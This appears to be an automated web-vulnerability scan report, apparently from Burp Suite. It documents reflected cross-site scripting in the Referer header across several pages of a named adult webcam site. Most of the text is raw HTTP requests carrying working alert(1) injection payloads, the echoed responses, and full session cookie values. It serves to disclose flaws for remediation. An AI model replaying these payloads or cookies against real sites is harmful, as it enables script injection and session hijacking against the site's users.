<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/user.aspx&he=imlive.com&ul=/webcam-sign-up/&rf=http://www.google.com/search?hl=en^q=3c53c'-alert(1)-'71f23548084&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7a8e5'><script>alert(1)</script>0a7d7dac8a3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /SiteInformation.html HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=7a8e5'><script>alert(1)</script>0a7d7dac8a3
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:46 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:46 GMT Connection: close Content-Length: 28320 Vary: Accept-Encoding
<html> <head> <meta name="keywords" content="live Video Chat, Video Chat live, Video Chat live, live Video Chat, webcam chat, live web cam, webcam live, live webcam, web cam live, web cam communti ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/live-sex-chats/terminology/&lr=1107816009&ud=0&pe=siteinformation.asp&rf=http://www.google.com/search?hl=en^q=7a8e5'><script>alert(1)</script>0a7d7dac8a3&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46fbb'-alert(1)-'f6926b45b35 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /awardarena/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=46fbb'-alert(1)-'f6926b45b35
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:59 GMT Connection: close Content-Length: 24721 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostawards.aspx&he=imlive.com&ul=/awardarena/&rf=http://www.google.com/search?hl=en^q=46fbb'-alert(1)-'f6926b45b35&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f517a'><script>alert(1)</script>7528764405c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /become_celeb.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=f517a'><script>alert(1)</script>7528764405c
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:25:00 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSx9rb%2Be3%2BOTRTIW6m11TETaF6QXi%2ByFiLHg95wp%2FGOR9lSwrZUtExpRjmx1VFU8tmLVZ5WOhWeG2PPzltaaotqhw%3D%3D; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:59 GMT Connection: close Content-Length: 13435 Vary: Accept-Encoding
<html> <head> <title>Celebrity Porn Star Sign Up at ImLive</title> <meta name="description" content="Already a Celebrity Porn star? Access millions of ImLive members through celebrity Porn Star L ...[SNIP]... img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/live-sex-chats/pornstars-sign-up/&lr=1107816008&ud=0&pe=become_celeb.asp&rf=http://www.google.com/search?hl=en^q=f517a'><script>alert(1)</script>7528764405c&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6689'-alert(1)-'b778a8b9f7a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /become_host.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=f6689'-alert(1)-'b778a8b9f7a
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:25:31 GMT Connection: close Content-Length: 21060 Vary: Accept-Encoding
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98226'-alert(1)-'ff8df7e9357 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /becomehost.aspx HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=98226'-alert(1)-'ff8df7e9357
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:25:01 GMT Connection: close Content-Length: 21060 Vary: Accept-Encoding
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b27c2'><script>alert(1)</script>5c3f838203 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /categoryfs.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=b27c2'><script>alert(1)</script>5c3f838203
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:14:26 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:14:26 GMT Connection: close Content-Length: 8327 Vary: Accept-Encoding
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c4ad1'><script>alert(1)</script>5d132d65cec was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /categoryfs.asp?cat=232 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=c4ad1'><script>alert(1)</script>5d132d65cec
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:14:00 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:14:01 GMT Connection: close Content-Length: 19002 Vary: Accept-Encoding
<html> <head> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <title>Find Friends & Romance on Live Webcam Video Chat at ImLive</title> <meta name="d ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/categoryfs.asp?cat=232&lr=1107816009&ud=0&pe=categoryfs.asp&rf=http://www.google.com/search?hl=en^q=c4ad1'><script>alert(1)</script>5d132d65cec&qs=cat=232&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload aec77'><script>alert(1)</script>01882fe6e1e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /categoryms.asp?cat=2 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=aec77'><script>alert(1)</script>01882fe6e1e
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:14:02 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:14:02 GMT Connection: close Content-Length: 21894 Vary: Accept-Encoding
<html> <head> <title>Mysticism & Spirituality Live Video Chat at ImLive</title> <META NAME="Description" CONTENT="Live video chat with Mysticism & Spirituality experts. Astrologers, Psychics ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/categoryms.asp?cat=2&lr=1107816009&ud=0&pe=categoryms.asp&rf=http://www.google.com/search?hl=en^q=aec77'><script>alert(1)</script>01882fe6e1e&qs=cat=2&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 69bb4'><script>alert(1)</script>8751657e5a8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /categoryms.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=69bb4'><script>alert(1)</script>8751657e5a8
Response (redirected)
